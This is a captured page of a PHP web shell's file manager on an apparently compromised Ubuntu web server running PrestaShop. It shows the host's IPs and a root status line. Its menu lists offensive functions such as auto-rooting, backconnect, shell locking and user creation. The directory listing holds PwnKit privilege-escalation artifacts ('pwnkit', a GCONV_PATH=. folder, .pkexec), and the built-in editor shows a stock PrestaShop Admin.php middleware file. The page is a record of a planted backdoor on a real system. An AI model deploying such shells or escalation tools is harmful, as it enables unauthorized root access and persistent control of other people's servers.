Linux vmi284606.contaboserver.net 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64
Apache/2.4.57 (Ubuntu)
: 167.86.127.34 | : 216.73.217.51
Cant Read [ /etc/named.conf ]
7.2.24-0ubuntu0.18.04.17
root
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
insepet /
tienda /
src /
Adapter /
Security /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
Admin.php
3.52
KB
-rwxrwxrwx
SslMiddleware.php
2.55
KB
-rwxrwxrwx
pwnkit
10.99
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : Admin.php
<?php /** * 2007-2019 PrestaShop and Contributors * * NOTICE OF LICENSE * * This source file is subject to the Open Software License (OSL 3.0) * that is bundled with this package in the file LICENSE.txt. * It is also available through the world-wide-web at this URL: * https://opensource.org/licenses/OSL-3.0 * If you did not receive a copy of the license and are unable to * obtain it through the world-wide-web, please send an email * to license@prestashop.com so we can send you a copy immediately. * * DISCLAIMER * * Do not edit or add to this file if you wish to upgrade PrestaShop to newer * versions in the future. If you wish to customize PrestaShop for your * needs please refer to https://www.prestashop.com for more information. * * @author PrestaShop SA <contact@prestashop.com> * @copyright 2007-2019 PrestaShop SA and Contributors * @license https://opensource.org/licenses/OSL-3.0 Open Software License (OSL 3.0) * International Registered Trademark & Property of PrestaShop SA */ namespace PrestaShop\PrestaShop\Adapter\Security; use PrestaShop\PrestaShop\Adapter\LegacyContext; use Symfony\Component\HttpFoundation\Request; use Symfony\Component\HttpKernel\Event\GetResponseEvent; use Symfony\Component\HttpKernel\HttpKernelInterface; use Symfony\Component\Security\Core\Authentication\Token\Storage\TokenStorage; use Symfony\Component\Security\Core\Authentication\Token\UsernamePasswordToken; use Symfony\Component\Security\Core\User\UserProviderInterface; /** * Admin Middleware security. */ class Admin { /** * @var LegacyContext */ private $context; /** * @var \Context */ private $legacyContext; /** * @var TokenStorage */ private $securityTokenStorage; /** * @var UserProviderInterface */ private $userProvider; public function __construct(LegacyContext $context, TokenStorage $securityTokenStorage, UserProviderInterface $userProvider) { $this->context = $context; $this->legacyContext = $context->getContext(); $this->securityTokenStorage = $securityTokenStorage; $this->userProvider = $userProvider; } /** * Check if employee is logged in * If not logged in, redirect to admin home page. * * @param GetResponseEvent $event * * @return bool or redirect */ public function onKernelRequest(GetResponseEvent $event) { //if employee loggdin in legacy context, authenticate him into sf2 security context if (isset($this->legacyContext->employee) && $this->legacyContext->employee->isLoggedBack()) { $user = $this->userProvider->loadUserByUsername($this->legacyContext->employee->email); $token = new UsernamePasswordToken($user, null, 'admin', $user->getRoles()); $this->securityTokenStorage->setToken($token); return true; } // in case of exception handler sub request, avoid infinite redirection if ($event->getRequestType() === HttpKernelInterface::SUB_REQUEST && isset($event->getRequest()->attributes['exception']) ) { return true; } //employee not logged in $event->stopPropagation(); //if http request - add 403 error $request = Request::createFromGlobals(); if ($request->isXmlHttpRequest()) { header('HTTP/1.1 403 Forbidden'); exit(); } //redirect to admin home page header('Location: ' . $this->context->getAdminLink('', false)); exit(); } }
Close